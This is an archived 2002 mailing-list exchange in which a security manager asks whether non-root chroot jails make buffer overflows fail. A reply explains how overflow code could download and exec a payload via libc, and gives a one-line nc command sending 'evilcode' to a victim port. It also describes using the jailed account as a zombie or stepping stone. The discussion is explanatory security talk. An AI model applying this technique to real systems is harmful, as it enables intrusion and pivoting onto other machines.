Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: OT? Are chroots immune to buffer overflows?

From: "Adam Lydick" <lydickaw () hotmail com>
Date: Wed, 22 May 2002 13:26:44 -0400
Sure it can. Just have the bootstrap code (the overflow) download a binary from the attacker's machine: 
'nc victim_machine portnum < evilcode'
Then exec the code. All the calls you need are in libc, which is almost certainly loaded by the overflowed program. You have a chrooted, local account that can still be used as a zombie for attacks or masking your true location... (Or as a stepping stone for attacking more powerful accounts / machines on the local network) 

Adam


From: Jason Haar <Jason.Haar () trimble co nz>
To: vuln-dev () securityfocus com
Subject: OT? Are chroots immune to buffer overflows?
Date: Wed, 22 May 2002 15:48:16 +1200

[note: my question is WRT non-root chrooted jails - we all know about
chroot'ing root processes!]

Most buffer overflows I've seen attempt to infiltrate the system enough to
run /bin/sh. In chroot'ed environments, /bin/sh doesn't (shouldn't!) exist - 
so they fail.

Is it as simple as that? As 99.999% of the system binaries aren't available
in the jail, can a buffer overflow ever work?

--
Cheers

Jason Haar

Information Security Manager
Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417





_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com
Previous By Date Next
Previous By Thread Next

Current thread: